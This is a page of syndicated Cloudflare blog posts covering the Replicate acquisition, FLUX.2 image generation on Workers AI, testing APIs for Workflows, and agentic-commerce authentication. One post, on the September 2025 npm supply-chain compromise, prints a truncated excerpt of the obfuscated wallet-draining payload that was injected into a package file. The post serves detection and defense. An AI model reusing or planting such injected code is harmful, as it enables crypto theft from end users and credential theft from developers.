Tag Archives: Developers

Why Replicate is joining Cloudflare

Post Syndicated from Andreas Jansson original https://blog.cloudflare.com/why-replicate-joining-cloudflare/

We’re happy to announce that as of today Replicate is officially part of Cloudflare.

When we started Replicate in 2019, OpenAI had just open sourced GPT-2, and few people outside of the machine learning community paid much attention to AI. But for those of us in the field, it felt like something big was about to happen. Remarkable models were being created in academic labs, but you needed a metaphorical lab coat to be able to run them.

We made it our mission to get research models out of the lab into the hands of developers. We wanted programmers to creatively bend and twist these models into products that the researchers would never have thought of.

We approached this as a tooling problem. Just like tools like Heroku made it possible to run websites without managing web servers, we wanted to build tools for running models without having to understand backpropagation or deal with CUDA errors.

The first tool we built was Cog: a standard packaging format for machine learning models. Then we built Replicate as the platform to run Cog models as API endpoints in the cloud. We abstracted away both the low-level machine learning, and the complicated GPU cluster management you need to run inference at scale.

It turns out the timing was just right. When Stable Diffusion was released in 2022 we had mature infrastructure that could handle the massive developer interest in running these models. A ton of fantastic apps and products were built on Replicate, apps that often ran a single model packaged in a slick UI to solve a particular use case.

Since then, AI Engineering has matured into a serious craft. AI apps are no longer just about running models. The modern AI stack has model inference, but also microservices, content delivery, object storage, caching, databases, telemetry, etc. We see many of our customers building complex heterogenous stacks where the Replicate models are one part of a higher-order system across several platforms.

This is why we’re joining Cloudflare. Replicate has the tools and primitives for running models. Cloudflare has the best network, Workers, R2, Durable Objects, and all the other primitives you need to build a full AI stack.

The AI stack lives entirely on the network. Models run on data center GPUs and are glued together by small cloud functions that call out to vector databases, fetch objects from blob storage, call MCP servers, etc. “The network is the computer” has never been more true.

At Cloudflare, we’ll now be able to build the AI infrastructure layer we have dreamed of since we started. We’ll be able to do things like run fast models on the edge, run model pipelines on instantly-booting Workers, stream model inputs and outputs with WebRTC, etc.

We’re proud of what we’ve built at Replicate. We were the first generative AI serving platform, and we defined the abstractions and design patterns that most of our peers have adopted. We’ve grown a wonderful community of builders and researchers around our product.

Partnering with Black Forest Labs to bring FLUX.2 [dev] to Workers AI

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/flux-2-workers-ai/

In recent months, we’ve seen a leap forward for closed-source image generation models with the rise of Google’s Nano Banana and OpenAI image generation models. Today, we’re happy to share that a new open-weight contender is back with the launch of Black Forest Lab’s FLUX.2 [dev] and available to run on Cloudflare’s inference platform, Workers AI. You can read more about this new model in detail on BFL’s blog post about their new model launch here.

We have been huge fans of Black Forest Lab’s FLUX image models since their earliest versions. Our hosted version of FLUX.1 [schnell] is one of the most popular models in our catalog for its photorealistic outputs and high-fidelity generations. When the time came to host the licensed version of their new model, we jumped at the opportunity. The FLUX.2 model takes all the best features of FLUX.1 and amps it up, generating even more realistic, grounded images with added customization support like JSON prompting.

Our Workers AI hosted version of FLUX.2 has some specific patterns, like using multipart form data to support input images (up to 4 512×512 images), and output images up to 4 megapixels. The multipart form data format allows users to send us multiple image inputs alongside the typical model parameters. Check out our developer docs changelog announcement to understand how to use the FLUX.2 model.

What makes FLUX.2 special? Physical world grounding, digital world assets, and multi-language support

The FLUX.2 model has a more robust understanding of the physical world, allowing you to turn abstract concepts into photorealistic reality. It excels at generating realistic image details and consistently delivers accurate hands, faces, fabrics, logos, and small objects that are often missed by other models. Its knowledge of the physical world also generates life-like lighting, angles and depth perception.


Figure 1. Image generated with FLUX.2 featuring accurate lighting, shadows, reflections and depth perception at a café in Paris.

This high-fidelity output makes it ideal for applications requiring superior image quality, such as creative photography, e-commerce product shots, marketing visuals, and interior design. Because it can understand context, tone, and trends, the model allows you to create engaging and editorial-quality digital assets from short prompts.

Aside from the physical world, the model is also able to generate high-quality digital assets such as designing landing pages or generating detailed infographics (see below for example). It’s also able to understand multiple languages naturally, so combining these two features – we can get a beautiful landing page in French from a French prompt.

Générer une page web visuellement immersive pour un service de promenade de chiens. L'image principale doit dominer l'écran, montrant un chien exubérant courant dans un parc ensoleillé, avec des touches de vert vif (#2ECC71) intégrées subtilement dans le feuillage ou les accessoires du chien. Minimiser le texte pour un impact visuel maximal.

Character consistency – solving for stochastic drift

FLUX.2 offers multi-reference editing with state-of-the-art character consistency, ensuring identities, products, and styles remain consistent for tasks. In the world of generative AI, getting a high-quality image is easy. However, getting the exact same character or product twice has always been the hard part. This is a phenomenon known as “stochastic drift”, where generated images drift away from the original source material.


Figure 2. Stochastic drift infographic (generated on FLUX.2)

One of FLUX.2’s breakthroughs is multi-reference image inputs designed to solve this consistency challenge. You’ll have the ability to change the background, lighting, or pose of an image without accidentally changing the face of your model or the design of your product. You can also reference other images or combine multiple images together to create something new. 

In code, Workers AI supports multi-reference images (up to 4) with a multipart form-data upload. The image inputs are binary images and output is a base64 encoded image:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT}/ai/run/@cf/black-forest-labs/flux-2-dev' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: multipart/form-data' \
  --form 'prompt=take the subject of image 2 and style it like image 1' \
  --form input_image_0=@/Users/johndoe/Desktop/icedoutkeanu.png \
  --form input_image_1=@/Users/johndoe/Desktop/me.png \
  --form steps=25
  --form width=1024
  --form height=1024

We also support this through the Workers AI Binding:

const image = await fetch("http://image-url");
const form = new FormData();
 
const image_blob = await streamToBlob(image.body, "image/png");
form.append('input_image_0', image_blob)
form.append('prompt', 'a sunset with the dog in the original image')
 
const resp = await env.AI.run("@cf/black-forest-labs/flux-2-dev", {
    multipart: {
        body: form,
        contentType: "multipart/form-data"
    }
})

Built for real world use cases

The newest image model signifies a shift towards functional business use cases, moving beyond simple image quality improvements. FLUX.2 enables you to:

  • Create Ad Variations: Generate 50 different advertisements using the exact same actor, without their face morphing between frames.

  • Trust Your Product Shots: Drop your product on a model, or into a beach scene, a city street, or a studio table. The environment changes, but your product stays accurate.

  • Build Dynamic Editorials: Produce a full fashion spread where the model looks identical in every single shot, regardless of the angle.


Figure 3. Combining the oversized hoodie and sweatpant ad photo (generated with FLUX.2) with Cloudflare’s logo to create product renderings with consistent faces, fabrics, and scenery. **Note: we prompted for white Cloudflare font as well instead of the original black font. 

Granular controls — JSON prompting, HEX codes and more!

The FLUX.2 model makes another advancement by allowing users to control small details in images through tools like JSON prompting and specifying specific hex codes.

For example, you could send this JSON as a prompt (as part of the multipart form input) and the resulting image follows the prompt exactly:


{
  "scene": "A bustling, neon-lit futuristic street market on an alien planet, rain slicking the metal ground",
  "subjects": [
    {
      "type": "Cyberpunk bounty hunter",
      "description": "Female, wearing black matte armor with glowing blue trim, holding a deactivated energy rifle, helmet under her arm, rain dripping off her synthetic hair",
      "pose": "Standing with a casual but watchful stance, leaning slightly against a glowing vendor stall",
      "position": "foreground"
    },
    {
      "type": "Merchant bot",
      "description": "Small, rusted, three-legged drone with multiple blinking red optical sensors, selling glowing synthetic fruit from a tray attached to its chassis",
      "pose": "Hovering slightly, offering an item to the viewer",
      "position": "midground"
    }
  ],
  "style": "noir sci-fi digital painting",
  "color_palette": [
    "deep indigo",
    "electric blue",
    "acid green"
  ],
  "lighting": "Low-key, dramatic, with primary light sources coming from neon signs and street lamps reflecting off wet surfaces",
  "mood": "Gritty, tense, and atmospheric",
  "background": "Towering, dark skyscrapers disappearing into the fog, with advertisements scrolling across their surfaces, flying vehicles (spinners) visible in the distance",
  "composition": "dynamic off-center",
  "camera": {
    "angle": "eye level",
    "distance": "medium close-up",
    "focus": "sharp on subject",
    "lens": "35mm",
    "f-number": "f/1.4",
    "ISO": 400
  },
  "effects": [
    "heavy rain effect",
    "subtle film grain",
    "neon light reflections",
    "mild chromatic aberration"
  ]
}

To take it further, we can ask the model to recolor the accent lighting to a Cloudflare orange by giving it a specific hex code like #F48120.


Try it out today!

The newest FLUX.2 [dev] model is now available on Workers AI — you can get started with the model through our developer docs or test it out on our multimodal playground.


Replicate is joining Cloudflare

Post Syndicated from Rita Kozlov original https://blog.cloudflare.com/replicate-joins-cloudflare/

We have some big news to share today: Replicate, the leading platform for running AI models, is joining Cloudflare.

We first started talking to Replicate because we shared a lot in common beyond just a passion for bright color palettes. Our mission for Cloudflare’s Workers developer platform has been to make building and deploying full-stack applications as easy as possible. Meanwhile, Replicate has been on a similar mission to make deploying AI models as easy as writing a single line of code. And we realized we could build something even better together by integrating the Replicate platform into Cloudflare directly.

We are excited to share this news and even more excited for what it will mean for customers. Bringing Replicate’s tools into Cloudflare will continue to make our Developer Platform the best place on the Internet to build and deploy any AI or agentic workflow.

What does this mean for you? 

Before we spend more time talking about the future of AI, we want to answer the questions that are top of mind for Replicate and Cloudflare users. In short: 

For existing Replicate users: Your APIs and workflows will continue to work without interruption. You will soon benefit from the added performance and reliability of Cloudflare’s global network.

For existing Workers AI users: Get ready for a massive expansion of the model catalog and the new ability to run fine-tunes and custom models directly on Workers AI.

Now – let’s get back into why we’re so excited about our joint future.

The AI Revolution was not televised, but it started with open source

Before AI was AI, and the subject of every conversation, it was known for decades as “machine learning”. It was a specialized, almost academic field. Progress was steady but siloed, with breakthroughs happening inside a few large, well-funded research labs. The models were monolithic, the data was proprietary, and the tools were inaccessible to most developers. Everything changed when the culture of open-source collaboration — the same force that built the modern Internet — collided with machine learning, as researchers and companies began publishing not just their papers, but their model weights and code.

This ignited an incredible explosion of innovation. The pace of change in just the past few years has been staggering; what was state-of-the-art 18 months ago (or sometimes it feels like just days ago) is now the baseline. This acceleration is most visible in generative AI. 

We went from uncanny, blurry curiosities to photorealistic image generation in what felt like the blink of an eye. Open source models like Stable Diffusion unlocked immediate creativity for developers, and that was just the beginning. If you take a look at Replicate’s model catalog today, you’ll see thousands of image models of almost every flavor, each iterating on the previous. 

This happened not just with image models, but video, audio, language models and more…. 

But this incredible, community-driven progress creates a massive practical challenge: How do you actually run these models? Every new model has different dependencies, requires specific GPU hardware (and enough of it), and needs a complex serving infrastructure to scale. Developers found themselves spending more time fighting with CUDA drivers and requirements.txt files than actually building their applications.

This is exactly the problem Replicate solved. They built a platform that abstracts away all that complexity (using their open-source tool Cog to package models into standard, reproducible containers), letting any developer or data scientist run even the most complex open-source models with a simple API call. 

Today, Replicate’s catalog spans more than 50,000 open-source models and fine-tuned models. While open source unlocked so many possibilities, Replicate’s toolset goes beyond that to make it possible for developers to access any models they need in one place. Period. With their marketplace, they also offer seamless access to leading proprietary models like GPT-5 and Claude Sonnet, all through the same unified API.

What’s worth noting is that Replicate didn’t just build an inference service; they built a community. So much innovation happens through being inspired by what others are doing, iterating on it, and making it better. Replicate has become the definitive hub for developers to discover, share, fine-tune, and experiment with the latest models in a public playground. 

Stronger together: the AI catalog meets the AI cloud

Coming back to the Workers Platform mission: Our goal all along has been to enable developers to build full-stack applications without having to burden themselves with infrastructure. And while that hasn’t changed, AI has changed the requirements of applications.

The types of applications developers are building are changing — three years ago, no one was building agents or creating AI-generated launch videos. Today they are. As a result, what they need and expect from the cloud, or the AI cloud, has changed too.

To meet the needs of developers, Cloudflare has been building the foundational pillars of the AI Cloud, designed to run inference at the edge, close to users. This isn’t just one product, but an entire stack:

  • Workers AI: Serverless GPU inference on our global network.

  • AI Gateway: A control plane for caching, rate-limiting, and observing any AI API.

  • Data Stack: Including Vectorize (our vector database) and R2 (for model and data storage).

  • Orchestration: Tools like AI Search (formerly Autorag), Agents, and Workflows to build complex, multi-step applications.

  • Foundation: All built on our core developer platform of Workers, Durable Objects, and the rest of our stack.

As we’ve been helping developers scale up their applications, Replicate has been on a similar mission — to make deploying AI models as easy as deploying code. This is where it all comes together. Replicate brings one of the industry’s largest and most vibrant model catalog and developer community. Cloudflare brings an incredibly performant global network and serverless inference platform. Together, we can deliver the best of both worlds: the most comprehensive selection of models, runnable on a fast, reliable, and affordable inference platform.

Our shared vision

For the community: the hub for AI exploration

The ability to share models, publish fine-tunes, collect stars, and experiment in the playground is the heart of the Replicate community. We will continue to invest in and grow this as the premier destination for AI discovery and experimentation, now supercharged by Cloudflare’s global network for an even faster, more responsive experience for everyone.

The future of inference: one platform, all models

Our vision is to bring the best of both platforms together. We will bring the entire Replicate catalog — all 50,000+ models and fine-tunes — to Workers AI. This gives you the ultimate choice: run models in Replicate’s flexible environment or on Cloudflare’s serverless platform, all from one place.

But we’re not just expanding the catalog. We are thrilled to announce that we will be bringing fine-tuning capabilities to Workers AI, powered by Replicate’s deep expertise. We are also making Workers AI more flexible than ever. Soon, you’ll be able to bring your own custom models to our network. We’ll leverage Replicate’s expertise with Cog to make this process seamless, reproducible, and easy.

The AI Cloud: more than just inference

Running a model is just one piece of the puzzle. The real magic happens when you connect AI to your entire application. Imagine what you can build when Replicate’s massive catalog is deeply integrated with the entire Cloudflare developer platform: run a model and store the results directly in R2 or Vectorize; trigger inference from a Worker or Queue; use Durable Objects to manage state for an AI agent; or build real-time generative UI with WebRTC and WebSockets.

To manage all this, we will integrate our unified inference platform deeply with the AI Gateway, giving you a single control plane for observability, prompt management, A/B testing, and cost analytics across all your models, whether they’re running on Cloudflare, Replicate, or any other provider.

Welcome to the team!

We are incredibly excited to welcome the Replicate team to Cloudflare. Their passion for the developer community and their expertise in the AI ecosystem are unmatched. We can’t wait to build the future of AI together.

Building a better testing experience for Workflows, our durable execution engine for multi-step applications

Post Syndicated from Olga Silva original https://blog.cloudflare.com/better-testing-for-workflows/

Cloudflare Workflows is our take on “Durable Execution.” They provide a serverless engine, powered by the Cloudflare Developer Platform, for building long-running, multi-step applications that persist through failures. When Workflows became generally available earlier this year, they allowed developers to orchestrate complex processes that would be difficult or impossible to manage with traditional stateless functions. Workflows handle state, retries, and long waits, allowing you to focus on your business logic.

However, complex orchestrations require robust testing to be reliable. To date, testing Workflows was a black-box process. Although you could test if a Workflow instance reached completion through an await to its status, there was no visibility into the intermediate steps. This made debugging really difficult. Did the payment processing step succeed? Did the confirmation email step receive the correct data? You couldn’t be sure without inspecting external systems or logs. 

Why was this necessary?

As developers ourselves, we understand the need to ensure reliable code, and we heard your feedback loud and clear: the developer experience for testing Workflows needed to be better.

The black box nature of testing was one part of the problem. Beyond that, though, the limited testing offered came at a high cost. If you added a workflow to your project, even if you weren’t testing the workflow directly, you were required to disable isolated storage because we couldn’t guarantee isolation between tests. Isolated storage is a vitest-pool-workers feature to guarantee that each test runs in a clean, predictable environment, free from the side effects of other tests. Being forced to have it disabled meant that state could leak between tests, leading to flaky, unpredictable, and hard-to-debug failures.

This created a difficult choice for developers building complex applications. If your project used Workers, Durable Objects, and R2 alongside Workflows, you had to either abandon isolated testing for your entire project or skip testing. This friction resulted in a poor testing experience, which in turn discouraged the adoption of Workflows. Solving this wasn’t just an improvement, it was a critical step in making Workflows part of any well-tested Cloudflare application.

Introducing isolated testing for Workflows

We’re introducing a new set of APIs that enable comprehensive, granular, and isolated testing for your Workflows, all running locally and offline with vitest-pool-workers, our testing framework that supports running tests in the Workers runtime workerd. This enables fast, reliable, and cheap test runs that don’t depend on a network connection.

They are available through the cloudflare:test module, with @cloudflare/vitest-pool-workers version 0.9.0 and above. The new test module provides two primary functions to introspect your Workflows:

  • introspectWorkflowInstance: useful for unit tests with known instance IDs

  • introspectWorkflow: useful for integration tests where IDs are typically generated dynamically.

Let’s walk through a practical example.

A practical example: testing a blog moderation workflow

Imagine a simple Workflow for moderating a blog. When a user submits a comment, the Workflow requests a review from workers-ai. Based on the violation score returned, it then waits for a moderator to approve or deny the comment. If approved, it calls a step.do to publish the comment via an external API.

Testing this without our new APIs would be impossible. You’d have no direct way to simulate the step’s outcomes and simulate the moderator’s approval. Now, you can mock everything.

Here’s the test code using introspectWorkflowInstance with a known instance ID:

import { env, introspectWorkflowInstance } from "cloudflare:test";

it("should mock a an ambiguous score, approve comment and complete", async () => {
   // CONFIG
   await using instance = await introspectWorkflowInstance(
       env.MODERATOR,
       "my-workflow-instance-id-123"
   );
   await instance.modify(async (m) => {
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 50 });
       await m.mockEvent({ 
           type: "moderation-approval", 
           payload: { action: "approved" },
       });
       await m.mockStepResult({ name: "publish comment" }, { status: "published" });
   });

   await env.MODERATOR.create({ id: "my-workflow-instance-id-123" });
   
   // ASSERTIONS
   expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual(
       { violationScore: 50 }
   );
   expect(
       await instance.waitForStepResult({ name: "publish comment" })
   ).toEqual({ status: "published" });

   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});

This test mocks the outcomes of steps that require external API calls, such as the ‘AI content scan’, which calls Workers AI, and the ‘publish comment’ step, which calls an external blog API.

If the instance ID is not known, because you are either making a worker request that starts one/multiple Workflow instances with random generated ids, you can call introspectWorkflow(env.MY_WORKFLOW). Here’s the test code for that scenario, where only one Workflow instance is created:

it("workflow mock a non-violation score and be successful", async () => {
   // CONFIG
   await using introspector = await introspectWorkflow(env.MODERATOR);
   await introspector.modifyAll(async (m) => {
       await m.disableSleeps();
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 0 });
   });

   await SELF.fetch(`https://mock-worker.local/moderate`);

   const instances = introspector.get();
   expect(instances.length).toBe(1);

   // ASSERTIONS
   const instance = instances[0];
   expect(await instance.waitForStepResult({ name: "AI content scan"  })).toEqual({ violationScore: 0 });
   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});

Notice how in both examples we’re calling the introspectors with await using – this is the Explicit Resource Management syntax from modern JavaScript. It is crucial here because when the introspector objects go out of scope at the end of the test, its disposal method is automatically called. This is how we ensure each test works with its own isolated storage.

The modify and modifyAll functions are the gateway to controlling instances. Inside its callback, you get access to a modifier object with methods to inject behavior such as mocking step outcomes, events and disabling sleeps.

You can find detailed documentation on the Workers Cloudflare Docs.

How we connected Vitest to the Workflows Engine

To understand the solution, you first need to understand the local architecture. When you run wrangler dev, your Workflows are powered by Miniflare, a simulator for testing Cloudflare Workers, and workerd. Each running workflow instance is backed by its own SQLite Durable Object, which we call the “Engine DO”. This Engine DO is responsible for executing steps, persisting state, and managing the instance’s lifecycle. It lives inside the local isolated Workers runtime.

Meanwhile, the Vitest test runner is a separate Node.js process living outside of workerd. This is why we have a Vitest custom pool that allows tests to run inside workerd called vitest-pool-workers. Vitest-pool-workers has a Runner Worker, which is a worker to run the tests with bindings to everything specified in the user wrangler.json file. This worker has access to the APIs under the “cloudflare:test” module. It communicates with Node.js through a special DO called Runner Object via WebSocket/RPC.

The first approach we considered was to use the test runner worker. In its current state, Runner worker has access to Workflow bindings from Workflows defined on the wrangler file. We considered also binding each Workflow’s Engine DO namespace to this runner worker. This would give vitest-pool-workers direct access to the Engine DOs where it would be possible to directly call Engine methods. 


While promising, this approach would have required undesirable changes to the core of Miniflare and vitest-pool-workers, making it too invasive for this single feature. 

Firstly, we would have needed to add a new unsafe field to Miniflare’s Durable Objects. Its sole purpose would be to specify the service name of our Engines, preventing Miniflare from applying its default user prefix which would otherwise prevent the Durable Objects from being found.

Secondly, vitest-pool-workers would have been forced to bind every Engine DO from the Workflows in the project to its runner, even those not being tested. This would introduce unwanted bindings into the test environment, requiring an additional cleanup to ensure they were not exposed to the user’s tests env.

The breakthrough

The solution is a combination of privileged local-only APIs and Remote Procedure Calls (RPC).

First, we added a set of unsafe functions to the local implementation of the Workflows binding, functions that are not available in the production environment. They act as a controlled access point, accessible from the test environment, allowing the test runner to get a stub to a specific Engine DO by providing its instance ID.

Once the test runner has this stub, it uses RPC to call specific, trusted methods on the Engine DO via a special RpcTarget called WorkflowInstanceModifier. Any class that extends RpcTarget has its objects replaced by a stub. Calling a method on this stub, in turn, makes an RPC back to the original object.


This simpler approach is far less invasive because it’s confined to the Workflows environment, which also ensures any future feature changes are safely isolated.

Introspecting Workflows with unknown IDs

When creating Workflows instances (either by create() or createBatch()) developers can provide a specific ID or have it automatically generated for them. This ID identifies the Workflow instance and is then used to create the associated Engine DO ID.

The logical starting point for implementation was introspectWorkflowInstance(binding, instanceID), as the instance ID is known in advance. This allows us to generate the Engine DO ID required to identify the engine associated with that Workflow instance.

But often, one part of your application (like an HTTP endpoint) will create a Workflow instance with a randomly generated ID. How can we introspect an instance when we don’t know its ID until after it’s created?

The answer was to use a powerful feature of JavaScript: Proxy objects.

When you use introspectWorkflow(binding), we wrap the Workflow binding in a Proxy. This proxy non-destructively intercepts all calls to the binding, specifically looking for .create() and .createBatch(). When your test triggers a workflow creation, the proxy inspects the call. It captures the instance ID — either one you provided or the random one generated — and immediately sets up the introspection on that ID, applying all the modifications you defined in the modifyAll call. The original creation call then proceeds as normal.

env[workflow] = new Proxy(env[workflow], {
  get(target, prop) {
    if (prop === "create") {
      return new Proxy(target.create, {
        async apply(_fn, _this, [opts = {}]) {

          // 1. Ensure an ID exists 
          const optsWithId = "id" in opts ? opts : { id: crypto.randomUUID(), ...opts };

          // 2. Apply test modifications before creation
          await introspectAndModifyInstance(optsWithId.id);

          // 3. Call the original 'create' method 
          return target.create(optsWithId);
        },
      });
    }

    // Same logic for createBatch()
  }
}

When the await using block from introspectWorkflow() finishes, or the dispose() method is called at the end of the test, the introspector is disposed of, and the proxy is removed, leaving the binding in its original state. It’s a low-impact approach that prioritizes developer experience and long-term maintainability.

Get started with testing Workflows

Ready to add tests to your Workflows? Here’s how to get started:

  1. Update your dependencies: Make sure you are using @cloudflare/vitest-pool-workers version 0.9.0 or newer. Run the following command in your project: npm install @cloudflare/vitest-pool-workers@latest

  2. Configure your test environment: If you’re new to testing on Workers, follow our guide to write your first test.

Start writing tests: Import introspectWorkflowInstance or introspectWorkflow from cloudflare:test in your test files and use the patterns shown in this post to mock, control, and assert on your Workflow’s behavior. Also check out the official API reference.

How Cloudflare’s client-side security made the npm supply chain attack a non-event

Post Syndicated from Bashyam Anant original https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/

In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than 2 billion downloads per week. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to steal developer tokens for CI/CD pipelines and cloud accounts.

As it relates to end users of your applications, the good news is that Cloudflare Page Shield, our client-side security offering will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.

export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …

Excerpt from the injected malicious payload, along with the rest of the innocuous normal code. Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).

Finding needles in a 3.5 billion script haystack

Everyday, Cloudflare Page Shield assesses 3.5 billion scripts per day or 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior blog post, we preprocess JavaScript code into an Abstract Syntax Tree to train a message-passing graph convolutional network (MPGCN) that classifies a given JavaScript file as either malicious or benign. 

The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the malicious code injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques. 

Our ML model outputs the probability that a script is malicious which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious and high scores indicating benign scripts. Importantly, like many Cloudflare ML models, inferencing happens in under 0.3 seconds. 

Model Evaluation

Since the initial launch, our JavaScript classifiers are constantly being evolved to optimize model evaluation metrics, in this case, F1 measure. Our current metrics are 

Metric

Latest: Version 2.7

Improvement over prior version

Precision

98%

5%

Recall

90%

233%

F1

94%

123%

Some of the improvements were accomplished through:

  • More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic

  • Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure

  • Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest

  • Tweaking the evaluation criteria to maximize recall with 99% precision

Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most False Positives we encounter in this way are rather challenging. For example, scripts that read all form inputs except credit card numbers (e.g. reject input values that test true using the Luhn algorithm), injecting dynamic scripts, heavy user tracking, heavy deobfuscation, etc. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (& testing) pipeline.

Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack, thus, not in the training data)..

Planned improvements

Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.

Consolidating classifiers

Over 3 years ago we launched our classifier, “Code Behaviour Analysis” for Magecart-style scripts that learns  code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our message-passing graph convolutional network (MPGCN) based approach that can also classify Magecart attacks. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of code behaviour analysis by the end of 2025. 

Staying safe always

In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch its traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.

Also make sure to consult our Page Shield Script detection to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.


Several scripts are marked as malicious. 


Several connections are marked as malicious. 

And be sure to complete the following steps:

  1. Audit your dependency tree for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. 

  2. Rotate any credentials that may have been exposed to your build environment.

  3. Revoke and reissue CI/CD tokens and service keys that might have been used in build pipelines (GitHub Actions, npm tokens, cloud credentials).

  4. Pin dependencies to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.

  5. Scan build logs and repos for suspicious commits/GitHub Actions changes and remove any unknown webhooks or workflows.

While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom Client-Side Risk Assessment.

Securing agentic commerce: helping AI Agents transact with Visa and Mastercard

Post Syndicated from Rohin Lohe original https://blog.cloudflare.com/secure-agentic-commerce/

The era of agentic commerce is coming, and it brings with it significant new challenges for security. That’s why Cloudflare is partnering with Visa and Mastercard to help secure automated commerce as AI agents search, compare, and purchase on behalf of consumers.

Through our collaboration, Visa developed the Trusted Agent Protocol and Mastercard developed Agent Pay to help merchants distinguish legitimate, approved agents from malicious bots. Both Trusted Agent Protocol and Agent Pay leverage Web Bot Auth as the agent authentication layer to allow networks like Cloudflare to verify traffic from AI shopping agents that register with a payment network.

The challenges with agentic commerce

Agentic commerce is commerce driven by AI agents. As AI agents execute more transactions, merchants need to protect themselves and maintain trust with their customers. Merchants are beginning to see the promise of agentic commerce but face significant challenges: 

  • How can they distinguish a helpful, approved AI shopping agent from a malicious bot or web crawler? 

  • Is the agent representing a known, repeat customer or someone entirely new? 

  • Are there particular instructions the consumer gave to their agent that the merchant should respect?

We are working with Visa and Mastercard, two of the most trusted consumer brands in payments, to address each of these challenges. 

Web Bot Auth is the foundation to securing agentic commerce

In May, we shared a new proposal called Web Bot Auth to cryptographically authenticate agent traffic. Historically, agent traffic has been classified using the user agent and IP address. However, these fields can be spoofed, leading to inaccurate classifications and bot mitigations can be applied inaccurately. Web Bot Auth allows an agent to provide a stable identifier by using HTTP Message Signatures with public key cryptography.

As we spent time collaborating with the teams at Visa and Mastercard, we found that we could leverage Web Bot Auth as the foundation to ensure that each commerce agent request was verifiable, time-based, and non-replayable.

Visa’s Trusted Agent Protocol and Mastercard’s Agent Pay present three key solutions for merchants to manage agentic commerce transactions. First, merchants can identify a registered agent and distinguish whether a particular interaction is intended to browse or to pay. Last, merchants can indicate to agents how a payment is expected, whether that is through a network token, browser-use guest checkout, or a micropayment.

